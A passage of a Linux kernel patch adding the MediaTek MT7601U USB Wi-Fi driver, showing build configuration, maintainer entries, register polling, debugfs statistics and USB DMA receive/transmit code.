drivers/net/wireless/mediatek/mt7601u/mcu.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/mcu.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/mt7601u.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/phy.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/regs.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/trace.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/trace.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/tx.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/usb.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/usb.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/util.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/util.h diff --git a/MAINTAINERS b/MAINTAINERS index df106f87a3ba..c6f4576efd56 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -6365,6 +6365,12 @@ F: include/uapi/linux/meye.h F: include/uapi/linux/ivtv* F: include/uapi/linux/uvcvideo.h +MEDIATEK MT7601U WIRELESS LAN DRIVER +M: Jakub Kicinski +L: linux-wireless@vger.kernel.org +S: Maintained +F: drivers/net/wireless/mediatek/mt7601u/ + MEGARAID SCSI/SAS DRIVERS M: Kashyap Desai M: Sumit Saxena diff --git a/drivers/net/wireless/Kconfig b/drivers/net/wireless/Kconfig index 16604bdf5197..a63ab2e83105 100644 --- a/drivers/net/wireless/Kconfig +++ b/drivers/net/wireless/Kconfig @@ -277,6 +277,7 @@ source "drivers/net/wireless/libertas/Kconfig" source "drivers/net/wireless/orinoco/Kconfig" source "drivers/net/wireless/p54/Kconfig" source "drivers/net/wireless/rt2x00/Kconfig" +source "drivers/net/wireless/mediatek/Kconfig" source "drivers/net/wireless/rtlwifi/Kconfig" source "drivers/net/wireless/ti/Kconfig" source "drivers/net/wireless/zd1211rw/Kconfig" diff --git a/drivers/net/wireless/Makefile b/drivers/net/wireless/Makefile index 0c8891686718..6b9e729dd8ac 100644 --- a/drivers/net/wireless/Makefile +++ b/drivers/net/wireless/Makefile @@ -45,6 +45,8 @@ obj-$(CONFIG_IWLWIFI) += iwlwifi/ obj-$(CONFIG_IWLEGACY) += iwlegacy/ obj-$(CONFIG_RT2X00) += rt2x00/ +obj-$(CONFIG_WL_MEDIATEK) += mediatek/ + obj-$(CONFIG_P54_COMMON) += p54/ obj-$(CONFIG_ATH_CARDS) += ath/ diff --git a/drivers/net/wireless/mediatek/Kconfig b/drivers/net/wireless/mediatek/Kconfig new file mode 100644 index 000000000000..cba300c6b5da --- /dev/null +++ b/drivers/net/wireless/mediatek/Kconfig @@ -0,0 +1,10 @@ +menuconfig WL_MEDIATEK + bool "Mediatek Wireless LAN support" + ---help--- + Enable community drivers for MediaTek WiFi devices. + Those drivers make use of the Linux mac80211 stack. + + +if WL_MEDIATEK +source "drivers/net/wireless/mediatek/mt7601u/Kconfig" +endif # WL_MEDIATEK diff --git a/drivers/net/wireless/mediatek/Makefile b/drivers/net/wireless/mediatek/Makefile new file mode 100644 index 000000000000..9d5f182fd7fd --- /dev/null +++ b/drivers/net/wireless/mediatek/Makefile @@ -0,0 +1 @@ +obj-$(CONFIG_MT7601U) += mt7601u/ diff --git a/drivers/net/wireless/mediatek/mt7601u/Kconfig b/drivers/net/wireless/mediatek/mt7601u/Kconfig new file mode 100644 index 000000000000..f46bed92796b --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/Kconfig @@ -0,0 +1,6 @@ +config MT7601U + tristate "MediaTek MT7601U (USB) support" + depends on MAC80211 + depends on USB + ---help--- + This adds support for MT7601U-based wireless USB dongles. diff --git a/drivers/net/wireless/mediatek/mt7601u/Makefile b/drivers/net/wireless/mediatek/mt7601u/Makefile new file mode 100644 index 000000000000..ea9ed8a5db4d --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/Makefile @@ -0,0 +1,9 @@ +ccflags-y += -D__CHECK_ENDIAN__ + +obj-$(CONFIG_MT7601U) += mt7601u.o + +mt7601u-objs = \ + usb.o init.o main.o mcu.o trace.o dma.o core.o eeprom.o phy.o \ + mac.o util.o debugfs.o tx.o + +CFLAGS_trace.o := -I$(src) diff --git a/drivers/net/wireless/mediatek/mt7601u/core.c b/drivers/net/wireless/mediatek/mt7601u/core.c new file mode 100644 index 000000000000..0aabd790f985 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/core.c @@ -0,0 +1,78 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include "mt7601u.h" + +int mt7601u_wait_asic_ready(struct mt7601u_dev *dev) +{ + int i = 100; + u32 val; + + do { + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return -EIO; + + val = mt7601u_rr(dev, MT_MAC_CSR0); + if (val && ~val) + return 0; + + udelay(10); + } while (i--); + + return -EIO; +} + +bool mt76_poll(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val, + int timeout) +{ + u32 cur; + + timeout /= 10; + do { + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return false; + + cur = mt7601u_rr(dev, offset) & mask; + if (cur == val) + return true; + + udelay(10); + } while (timeout-- > 0); + + dev_err(dev->dev, "Error: Time out with reg %08x\n", offset); + + return false; +} + +bool mt76_poll_msec(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val, + int timeout) +{ + u32 cur; + + timeout /= 10; + do { + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return false; + + cur = mt7601u_rr(dev, offset) & mask; + if (cur == val) + return true; + + msleep(10); + } while (timeout-- > 0); + + dev_err(dev->dev, "Error: Time out with reg %08x\n", offset); + + return false; +} diff --git a/drivers/net/wireless/mediatek/mt7601u/debugfs.c b/drivers/net/wireless/mediatek/mt7601u/debugfs.c new file mode 100644 index 000000000000..fc008475a03b --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/debugfs.c @@ -0,0 +1,172 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include + +#include "mt7601u.h" +#include "eeprom.h" + +static int +mt76_reg_set(void *data, u64 val) +{ + struct mt7601u_dev *dev = data; + + mt76_wr(dev, dev->debugfs_reg, val); + return 0; +} + +static int +mt76_reg_get(void *data, u64 *val) +{ + struct mt7601u_dev *dev = data; + + *val = mt76_rr(dev, dev->debugfs_reg); + return 0; +} + +DEFINE_SIMPLE_ATTRIBUTE(fops_regval, mt76_reg_get, mt76_reg_set, "0x%08llx\n"); + +static int +mt7601u_ampdu_stat_read(struct seq_file *file, void *data) +{ + struct mt7601u_dev *dev = file->private; + int i, j; + +#define stat_printf(grp, off, name) \ + seq_printf(file, #name ":\t%llu\n", dev->stats.grp[off]) + + stat_printf(rx_stat, 0, rx_crc_err); + stat_printf(rx_stat, 1, rx_phy_err); + stat_printf(rx_stat, 2, rx_false_cca); + stat_printf(rx_stat, 3, rx_plcp_err); + stat_printf(rx_stat, 4, rx_fifo_overflow); + stat_printf(rx_stat, 5, rx_duplicate); + + stat_printf(tx_stat, 0, tx_fail_cnt); + stat_printf(tx_stat, 1, tx_bcn_cnt); + stat_printf(tx_stat, 2, tx_success); + stat_printf(tx_stat, 3, tx_retransmit); + stat_printf(tx_stat, 4, tx_zero_len); + stat_printf(tx_stat, 5, tx_underflow); + + stat_printf(aggr_stat, 0, non_aggr_tx); + stat_printf(aggr_stat, 1, aggr_tx); + + stat_printf(zero_len_del, 0, tx_zero_len_del); + stat_printf(zero_len_del, 1, rx_zero_len_del); +#undef stat_printf + + seq_puts(file, "Aggregations stats:\n"); + for (i = 0; i < 4; i++) { + for (j = 0; j < 8; j++) + seq_printf(file, "%08llx ", + dev->stats.aggr_n[i * 8 + j]); + seq_putc(file, '\n'); + } + + seq_printf(file, "recent average AMPDU len: %d\n", + atomic_read(&dev->avg_ampdu_len)); + + return 0; +} + +static int +mt7601u_ampdu_stat_open(struct inode *inode, struct file *f) +{ + return single_open(f, mt7601u_ampdu_stat_read, inode->i_private); +} + +static const struct file_operations fops_ampdu_stat = { + .open = mt7601u_ampdu_stat_open, + .read = seq_read, + .llseek = seq_lseek, + .release = single_release, +}; + +static int +mt7601u_eeprom_param_read(struct seq_file *file, void *data) +{ + struct mt7601u_dev *dev = file->private; + struct mt7601u_rate_power *rp = &dev->ee->power_rate_table; + struct tssi_data *td = &dev->ee->tssi_data; + int i; + + seq_printf(file, "RF freq offset: %hhx\n", dev->ee->rf_freq_off); + seq_printf(file, "RSSI offset: %hhx %hhx\n", + dev->ee->rssi_offset[0], dev->ee->rssi_offset[1]); + seq_printf(file, "Reference temp: %hhx\n", dev->ee->ref_temp); + seq_printf(file, "LNA gain: %hhx\n", dev->ee->lna_gain); + seq_printf(file, "Reg channels: %hhu-%hhu\n", dev->ee->reg.start, + dev->ee->reg.start + dev->ee->reg.num - 1); + + seq_puts(file, "Per rate power:\n"); + for (i = 0; i < 2; i++) + seq_printf(file, "\t raw:%02hhx bw20:%02hhx bw40:%02hhx\n", + rp->cck[i].raw, rp->cck[i].bw20, rp->cck[i].bw40); + for (i = 0; i < 4; i++) + seq_printf(file, "\t raw:%02hhx bw20:%02hhx bw40:%02hhx\n", + rp->ofdm[i].raw, rp->ofdm[i].bw20, rp->ofdm[i].bw40); + for (i = 0; i < 4; i++) + seq_printf(file, "\t raw:%02hhx bw20:%02hhx bw40:%02hhx\n", + rp->ht[i].raw, rp->ht[i].bw20, rp->ht[i].bw40); + + seq_puts(file, "Per channel power:\n"); + for (i = 0; i < 7; i++) + seq_printf(file, "\t tx_power ch%u:%02hhx ch%u:%02hhx\n", + i * 2 + 1, dev->ee->chan_pwr[i * 2], + i * 2 + 2, dev->ee->chan_pwr[i * 2 + 1]); + + if (!dev->ee->tssi_enabled) + return 0; + + seq_puts(file, "TSSI:\n"); + seq_printf(file, "\t slope:%02hhx\n", td->slope); + seq_printf(file, "\t offset=%02hhx %02hhx %02hhx\n", + td->offset[0], td->offset[1], td->offset[2]); + seq_printf(file, "\t delta_off:%08x\n", td->tx0_delta_offset); + + return 0; +} + +static int +mt7601u_eeprom_param_open(struct inode *inode, struct file *f) +{ + return single_open(f, mt7601u_eeprom_param_read, inode->i_private); +} + +static const struct file_operations fops_eeprom_param = { + .open = mt7601u_eeprom_param_open, + .read = seq_read, + .llseek = seq_lseek, + .release = single_release, +}; + +void mt7601u_init_debugfs(struct mt7601u_dev *dev) +{ + struct dentry *dir; + + dir = debugfs_create_dir("mt7601u", dev->hw->wiphy->debugfsdir); + if (!dir) + return; + + debugfs_create_u8("temperature", S_IRUSR, dir, &dev->raw_temp); + debugfs_create_u32("temp_mode", S_IRUSR, dir, &dev->temp_mode); + + debugfs_create_u32("regidx", S_IRUSR | S_IWUSR, dir, &dev->debugfs_reg); + debugfs_create_file("regval", S_IRUSR | S_IWUSR, dir, dev, + &fops_regval); + debugfs_create_file("ampdu_stat", S_IRUSR, dir, dev, &fops_ampdu_stat); + debugfs_create_file("eeprom_param", S_IRUSR, dir, dev, + &fops_eeprom_param); +} diff --git a/drivers/net/wireless/mediatek/mt7601u/dma.c b/drivers/net/wireless/mediatek/mt7601u/dma.c new file mode 100644 index 000000000000..9c9e1288644b --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/dma.c @@ -0,0 +1,533 @@ +/* + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include "mt7601u.h" +#include "dma.h" +#include "usb.h" +#include "trace.h" + +static int mt7601u_submit_rx_buf(struct mt7601u_dev *dev, + struct mt7601u_dma_buf_rx *e, gfp_t gfp); + +static unsigned int ieee80211_get_hdrlen_from_buf(const u8 *data, unsigned len) +{ + const struct ieee80211_hdr *hdr = (const struct ieee80211_hdr *)data; + unsigned int hdrlen; + + if (unlikely(len < 10)) + return 0; + hdrlen = ieee80211_hdrlen(hdr->frame_control); + if (unlikely(hdrlen > len)) + return 0; + return hdrlen; +} + +static struct sk_buff * +mt7601u_rx_skb_from_seg(struct mt7601u_dev *dev, struct mt7601u_rxwi *rxwi, + u8 *data, u32 seg_len) +{ + struct sk_buff *skb; + u32 true_len; + + if (rxwi->rxinfo & cpu_to_le32(MT_RXINFO_L2PAD)) + seg_len -= 2; + + skb = alloc_skb(seg_len, GFP_ATOMIC); + if (!skb) + return NULL; + + if (rxwi->rxinfo & cpu_to_le32(MT_RXINFO_L2PAD)) { + int hdr_len = ieee80211_get_hdrlen_from_buf(data, seg_len); + + memcpy(skb_put(skb, hdr_len), data, hdr_len); + data += hdr_len + 2; + seg_len -= hdr_len; + } + + memcpy(skb_put(skb, seg_len), data, seg_len); + + true_len = mt76_mac_process_rx(dev, skb, skb->data, rxwi); + skb_trim(skb, true_len); + + return skb; +} + +static struct sk_buff * +mt7601u_rx_skb_from_seg_paged(struct mt7601u_dev *dev, + struct mt7601u_rxwi *rxwi, void *data, + u32 seg_len, u32 truesize, struct page *p) +{ + unsigned int hdr_len = ieee80211_get_hdrlen_from_buf(data, seg_len); + unsigned int true_len, copy, frag; + struct sk_buff *skb; + + skb = alloc_skb(128, GFP_ATOMIC); + if (!skb) + return NULL; + + true_len = mt76_mac_process_rx(dev, skb, data, rxwi); + + if (rxwi->rxinfo & cpu_to_le32(MT_RXINFO_L2PAD)) { + memcpy(skb_put(skb, hdr_len), data, hdr_len); + data += hdr_len + 2; + true_len -= hdr_len; + hdr_len = 0; + } + + copy = (true_len <= skb_tailroom(skb)) ? true_len : hdr_len + 8; + frag = true_len - copy; + + memcpy(skb_put(skb, copy), data, copy); + data += copy; + + if (frag) { + skb_add_rx_frag(skb, 0, p, data - page_address(p), + frag, truesize); + get_page(p); + } + + return skb; +} + +static void mt7601u_rx_process_seg(struct mt7601u_dev *dev, u8 *data, + u32 seg_len, struct page *p, bool paged) +{ + struct sk_buff *skb; + struct mt7601u_rxwi *rxwi; + u32 fce_info, truesize = seg_len; + + /* DMA_INFO field at the beginning of the segment contains only some of + * the information, we need to read the FCE descriptor from the end. + */ + fce_info = get_unaligned_le32(data + seg_len - MT_FCE_INFO_LEN); + seg_len -= MT_FCE_INFO_LEN; + + data += MT_DMA_HDR_LEN; + seg_len -= MT_DMA_HDR_LEN; + + rxwi = (struct mt7601u_rxwi *) data; + data += sizeof(struct mt7601u_rxwi); + seg_len -= sizeof(struct mt7601u_rxwi); + + if (unlikely(rxwi->zero[0] || rxwi->zero[1] || rxwi->zero[2])) + dev_err_once(dev->dev, "Error: RXWI zero fields are set\n"); + if (unlikely(MT76_GET(MT_RXD_INFO_TYPE, fce_info))) + dev_err_once(dev->dev, "Error: RX path seen a non-pkt urb\n"); + + trace_mt_rx(dev, rxwi, fce_info); + + if (paged) + skb = mt7601u_rx_skb_from_seg_paged(dev, rxwi, data, seg_len, + truesize, p); + else + skb = mt7601u_rx_skb_from_seg(dev, rxwi, data, seg_len); + if (!skb) + return; + + ieee80211_rx_ni(dev->hw, skb); +} + +static u16 mt7601u_rx_next_seg_len(u8 *data, u32 data_len) +{ + u32 min_seg_len = MT_DMA_HDR_LEN + MT_RX_INFO_LEN + + sizeof(struct mt7601u_rxwi) + MT_FCE_INFO_LEN; + u16 dma_len = get_unaligned_le16(data); + + if (data_len < min_seg_len || + WARN_ON(!dma_len) || + WARN_ON(dma_len + MT_DMA_HDRS > data_len) || + WARN_ON(dma_len & 0x3)) + return 0; + + return MT_DMA_HDRS + dma_len; +} + +static void +mt7601u_rx_process_entry(struct mt7601u_dev *dev, struct mt7601u_dma_buf_rx *e) +{ + u32 seg_len, data_len = e->urb->actual_length; + u8 *data = page_address(e->p); + struct page *new_p = NULL; + bool paged = true; + int cnt = 0; + + if (!test_bit(MT7601U_STATE_INITIALIZED, &dev->state)) + return; + + /* Copy if there is very little data in the buffer. */ + if (data_len < 512) { + paged = false; + } else { + new_p = dev_alloc_pages(MT_RX_ORDER); + if (!new_p) + paged = false; + } + + while ((seg_len = mt7601u_rx_next_seg_len(data, data_len))) { + mt7601u_rx_process_seg(dev, data, seg_len, e->p, paged); + + data_len -= seg_len; + data += seg_len; + cnt++; + } + + if (cnt > 1) + trace_mt_rx_dma_aggr(dev, cnt, paged); + + if (paged) { + /* we have one extra ref from the allocator */ + __free_pages(e->p, MT_RX_ORDER); + + e->p = new_p; + } +} + +static struct mt7601u_dma_buf_rx * +mt7601u_rx_get_pending_entry(struct mt7601u_dev *dev) +{ + struct mt7601u_rx_queue *q = &dev->rx_q; + struct mt7601u_dma_buf_rx *buf = NULL; + unsigned long flags; + + spin_lock_irqsave(&dev->rx_lock, flags); + + if (!q->pending) + goto out; + + buf = &q->e[q->start]; + q->pending--; + q->start = (q->start + 1) % q->entries; +out: + spin_unlock_irqrestore(&dev->rx_lock, flags); + + return buf; +} + +static void mt7601u_complete_rx(struct urb *urb) +{ + struct mt7601u_dev *dev = urb->context; + struct mt7601u_rx_queue *q = &dev->rx_q; + unsigned long flags; + + spin_lock_irqsave(&dev->rx_lock, flags); + + if (mt7601u_urb_has_error(urb)) + dev_err(dev->dev, "Error: RX urb failed:%d\n", urb->status); + if (WARN_ONCE(q->e[q->end].urb != urb, "RX urb mismatch")) + goto out; + + q->end = (q->end + 1) % q->entries; + q->pending++; + tasklet_schedule(&dev->rx_tasklet); +out: + spin_unlock_irqrestore(&dev->rx_lock, flags); +} + +static void mt7601u_rx_tasklet(unsigned long data) +{ + struct mt7601u_dev *dev = (struct mt7601u_dev *) data; + struct mt7601u_dma_buf_rx *e; + + while ((e = mt7601u_rx_get_pending_entry(dev))) { + if (e->urb->status) + continue; + + mt7601u_rx_process_entry(dev, e); + mt7601u_submit_rx_buf(dev, e, GFP_ATOMIC); + } +} + +static void mt7601u_complete_tx(struct urb *urb) +{ + struct mt7601u_tx_queue *q = urb->context; + struct mt7601u_dev *dev = q->dev; + struct sk_buff *skb; + unsigned long flags; + + spin_lock_irqsave(&dev->tx_lock, flags); + + if (mt7601u_urb_has_error(urb)) + dev_err(dev->dev, "Error: TX urb failed:%d\n", urb->status); + if (WARN_ONCE(q->e[q->start].urb != urb, "TX urb mismatch")) + goto out; + + skb = q->e[q->start].skb; + trace_mt_tx_dma_done(dev, skb); + + mt7601u_tx_status(dev, skb); + + if (q->used == q->entries - q->entries / 8) + ieee80211_wake_queue(dev->hw, skb_get_queue_mapping(skb)); + + q->start = (q->start + 1) % q->entries; + q->used--; + + if (urb->status) + goto out; + + set_bit(MT7601U_STATE_MORE_STATS, &dev->state); + if (!test_and_set_bit(MT7601U_STATE_READING_STATS, &dev->state)) + queue_delayed_work(dev->stat_wq, &dev->stat_work, + msecs_to_jiffies(10)); +out: + spin_unlock_irqrestore(&dev->tx_lock, flags); +} + +static int mt7601u_dma_submit_tx(struct mt7601u_dev *dev, + struct sk_buff *skb, u8 ep) +{ + struct usb_device *usb_dev = mt7601u_to_usb_dev(dev); + unsigned snd_pipe = usb_sndbulkpipe(usb_dev, dev->out_eps[ep]); + struct mt7601u_dma_buf_tx *e; + struct mt7601u_tx_queue *q = &dev->tx_q[ep]; + unsigned long flags; + int ret; + + spin_lock_irqsave(&dev->tx_lock, flags); + + if (WARN_ON(q->entries <= q->used)) { + ret = -ENOSPC; + goto out; + } + + e = &q->e[q->end]; + e->skb = skb; + usb_fill_bulk_urb(e->urb, usb_dev, snd_pipe, skb->data, skb->len, + mt7601u_complete_tx, q); + ret = usb_submit_urb(e->urb, GFP_ATOMIC); + if (ret) { + /* Special-handle ENODEV from TX urb submission because it will + * often be the first ENODEV we see after device is removed. + */ + if (ret == -ENODEV) + set_bit(MT7601U_STATE_REMOVED, &dev->state); + else + dev_err(dev->dev, "Error: TX urb submit failed:%d\n", + ret); + goto out; + } + + q->end = (q->end + 1) % q->entries; + q->used++; + + if (q->used >= q->entries) + ieee80211_stop_queue(dev->hw, skb_get_queue_mapping(skb)); +out: + spin_unlock_irqrestore(&dev->tx_lock, flags); + + return ret; +} + +/* Map hardware Q to USB endpoint number */ +static u8 q2ep(u8 qid) +{ + /* TODO: take management packets to queue 5 */ + return qid + 1; +} + +/* Map USB endpoint number to Q id in the DMA engine */ +static enum mt76_qsel ep2dmaq(u8 ep) +{ + if (ep == 5) + return MT_QSEL_MGMT; + return MT_QSEL_EDCA; +} + +int mt7601u_dma_enqueue_tx(struct mt7601u_dev *dev, struct sk_buff *skb, + struct mt76_wcid *wcid, int hw_q) +{ + u8 ep = q2ep(hw_q); + u32 dma_flags; + int ret; + + dma_flags = MT_TXD_PKT_INFO_80211; + if (wcid->hw_key_idx == 0xff) + dma_flags |= MT_TXD_PKT_INFO_WIV; + + ret = mt7601u_dma_skb_wrap_pkt(skb, ep2dmaq(ep), dma_flags); + if (ret) + return ret; + + ret = mt7601u_dma_submit_tx(dev, skb, ep); + if (ret) { + ieee80211_free_txskb(dev->hw, skb); + return ret; + } + + return 0; +} + +static void mt7601u_kill_rx(struct mt7601u_dev *dev) +{ + int i; + unsigned long flags; + + spin_lock_irqsave(&dev->rx_lock, flags); + + for (i = 0; i < dev->rx_q.entries; i++) { + int next = dev->rx_q.end; + + spin_unlock_irqrestore(&dev->rx_lock, flags); + usb_poison_urb(dev->rx_q.e[next].urb); + spin_lock_irqsave(&dev->rx_lock, flags); + } + + spin_unlock_irqrestore(&dev->rx_lock, flags); +} + +static int mt7601u_submit_rx_buf(struct mt7601u_dev *dev, + struct mt7601u_dma_buf_rx *e, gfp_t gfp) +{ + struct usb_device *usb_dev = mt7601u_to_usb_dev(dev); + u8 *buf = page_address(e->p); + unsigned pipe; + int ret; + + pipe = usb_rcvbulkpipe(usb_dev, dev->in_eps[MT_EP_IN_PKT_RX]); + + usb_fill_bulk_urb(e->urb, usb_dev, pipe, buf, MT_RX_URB_SIZE, + mt7601u_complete_rx, dev); + + trace_mt_submit_urb(dev, e->urb); + ret = usb_submit_urb(e->urb, gfp); + if (ret) + dev_err(dev->dev, "Error: submit RX URB failed:%d\n", ret); + + return ret; +} + +static int mt7601u_submit_rx(struct mt7601u_dev *dev) +{ + int i, ret; + + for (i = 0; i < dev->rx_q.entries; i++) { + ret = mt7601u_submit_rx_buf(dev, &dev->rx_q.e[i], GFP_KERNEL); + if (ret) + return ret; + } + + return 0; +} + +static void mt7601u_free_rx(struct mt7601u_dev *dev) +{ + int i; + + for (i = 0; i < dev->rx_q.entries; i++) { + __free_pages(dev->rx_q.e[i].p, MT_RX_ORDER); + usb_free_urb(dev->rx_q.e[i].urb); + } +} + +static int mt7601u_alloc_rx(struct mt7601u_dev *dev) +{ + int i; + + memset(&dev->rx_q, 0, sizeof(dev->rx_q)); + dev->rx_q.dev = dev; + dev->rx_q.entries = N_RX_ENTRIES; + + for (i = 0; i < N_RX_ENTRIES; i++) { + dev->rx_q.e[i].urb = usb_alloc_urb(0, GFP_KERNEL); + dev->rx_q.e[i].p = dev_alloc_pages(MT_RX_ORDER); + + if (!dev->rx_q.e[i].urb || !dev->rx_q.e[i].p) + return -ENOMEM; + } + + return 0; +} + +static void mt7601u_free_tx_queue(struct mt7601u_tx_queue *q) +{ + int i; + + WARN_ON(q->used); + + for (i = 0; i < q->entries; i++) { + usb_poison_urb(q->e[i].urb); + usb_free_urb(q->e[i].urb); + } +} + +static void mt7601u_free_tx(struct mt7601u_dev *dev) +{ + int i; + + for (i = 0; i < __MT_EP_OUT_MAX; i++) + mt7601u_free_tx_queue(&dev->tx_q[i]); +} + +static int mt7601u_alloc_tx_queue(struct mt7601u_dev *dev, + struct mt7601u_tx_queue *q) +{ + int i; + + q->dev = dev; + q->entries = N_TX_ENTRIES; + + for (i = 0; i < N_TX_ENTRIES; i++) { + q->e[i].urb = usb_alloc_urb(0, GFP_KERNEL); + if (!q->e[i].urb) + return -ENOMEM; + } + + return 0; +} + +static int mt7601u_alloc_tx(struct mt7601u_dev *dev) +{ + int i; + + dev->tx_q = devm_kcalloc(dev->dev, __MT_EP_OUT_MAX, + sizeof(*dev->tx_q), GFP_KERNEL); + + for (i = 0; i < __MT_EP_OUT_MAX; i++) + if (mt7601u_alloc_tx_queue(dev, &dev->tx_q[i])) + return -ENOMEM; + + return 0; +} + +int mt7601u_dma_init(struct mt7601u_dev *dev) +{ + int ret = -ENOMEM; + + tasklet_init(&dev->rx_tasklet, mt7601u_rx_tasklet, (unsigned long) dev); + + ret = mt7601u_alloc_tx(dev); + if (ret) + goto err; + ret = mt7601u_alloc_rx(dev); + if (ret) + goto err; + + ret = mt7601u_submit_rx(dev); + if (ret) + goto err; + + return 0; +err: + mt7601u_dma_cleanup(dev); + return ret; +} + +void mt7601u_dma_cleanup(struct mt7601u_dev *dev) +{ + mt7601u_kill_rx(dev); + + tasklet_kill(&dev->rx_tasklet); + + mt7601u_free_rx(dev); + mt7601u_free_tx(dev); +} diff --git a/drivers/net/wireless/mediatek/mt7601u/dma.h b/drivers/net/wireless/mediatek/mt7601u/dma.h new file mode 100644 index 000000000000..978e8a90b87f --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/dma.h @@ -0,0 +1,127 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT7601U_DMA_H +#define __MT7601U_DMA_H + +#include +#include + +#include "util.h" + +#define MT_DMA_HDR_LEN 4 +#define MT_RX_INFO_LEN 4 +#define MT_FCE_INFO_LEN 4 +#define MT_DMA_HDRS (MT_DMA_HDR_LEN + MT_RX_INFO_LEN) + +/* Common Tx DMA descriptor fields */ +#define MT_TXD_INFO_LEN GENMASK(15, 0) +#define MT_TXD_INFO_D_PORT GENMASK(29, 27) +#define MT_TXD_INFO_TYPE GENMASK(31, 30) + +enum mt76_msg_port { + WLAN_PORT, + CPU_RX_PORT, + CPU_TX_PORT, + HOST_PORT, + VIRTUAL_CPU_RX_PORT, + VIRTUAL_CPU_TX_PORT, + DISCARD, +}; + +enum mt76_info_type { + DMA_PACKET, + DMA_COMMAND, +}; + +/* Tx DMA packet specific flags */ +#define MT_TXD_PKT_INFO_NEXT_VLD BIT(16) +#define MT_TXD_PKT_INFO_TX_BURST BIT(17) +#define MT_TXD_PKT_INFO_80211 BIT(19) +#define MT_TXD_PKT_INFO_TSO BIT(20) +#define MT_TXD_PKT_INFO_CSO BIT(21) +#define MT_TXD_PKT_INFO_WIV BIT(24) +#define MT_TXD_PKT_INFO_QSEL GENMASK(26, 25) + +enum mt76_qsel { + MT_QSEL_MGMT, + MT_QSEL_HCCA, + MT_QSEL_EDCA, + MT_QSEL_EDCA_2, +}; + +/* Tx DMA MCU command specific flags */ +#define MT_TXD_CMD_INFO_SEQ GENMASK(19, 16) +#define MT_TXD_CMD_INFO_TYPE GENMASK(26, 20) + +static inline int mt7601u_dma_skb_wrap(struct sk_buff *skb, + enum mt76_msg_port d_port, + enum mt76_info_type type, u32 flags) +{ + u32 info; + + /* Buffer layout: + * | 4B | xfer len | pad | 4B | + * | TXINFO | pkt/cmd | zero pad to 4B | zero | + * + * length field of TXINFO should be set to 'xfer len'. + */ + + info = flags | + MT76_SET(MT_TXD_INFO_LEN, round_up(skb->len, 4)) | + MT76_SET(MT_TXD_INFO_D_PORT, d_port) | + MT76_SET(MT_TXD_INFO_TYPE, type); + + put_unaligned_le32(info, skb_push(skb, sizeof(info))); + return skb_put_padto(skb, round_up(skb->len, 4) + 4); +} + +static inline int +mt7601u_dma_skb_wrap_pkt(struct sk_buff *skb, enum mt76_qsel qsel, u32 flags) +{ + flags |= MT76_SET(MT_TXD_PKT_INFO_QSEL, qsel); + return mt7601u_dma_skb_wrap(skb, WLAN_PORT, DMA_PACKET, flags); +} + +/* Common Rx DMA descriptor fields */ +#define MT_RXD_INFO_LEN GENMASK(13, 0) +#define MT_RXD_INFO_PCIE_INTR BIT(24) +#define MT_RXD_INFO_QSEL GENMASK(26, 25) +#define MT_RXD_INFO_PORT GENMASK(29, 27) +#define MT_RXD_INFO_TYPE GENMASK(31, 30) + +/* Rx DMA packet specific flags */ +#define MT_RXD_PKT_INFO_UDP_ERR BIT(16) +#define MT_RXD_PKT_INFO_TCP_ERR BIT(17) +#define MT_RXD_PKT_INFO_IP_ERR BIT(18) +#define MT_RXD_PKT_INFO_PKT_80211 BIT(19) +#define MT_RXD_PKT_INFO_L3L4_DONE BIT(20) +#define MT_RXD_PKT_INFO_MAC_LEN GENMASK(23, 21) + +/* Rx DMA MCU command specific flags */ +#define MT_RXD_CMD_INFO_SELF_GEN BIT(15) +#define MT_RXD_CMD_INFO_CMD_SEQ GENMASK(19, 16) +#define MT_RXD_CMD_INFO_EVT_TYPE GENMASK(23, 20) + 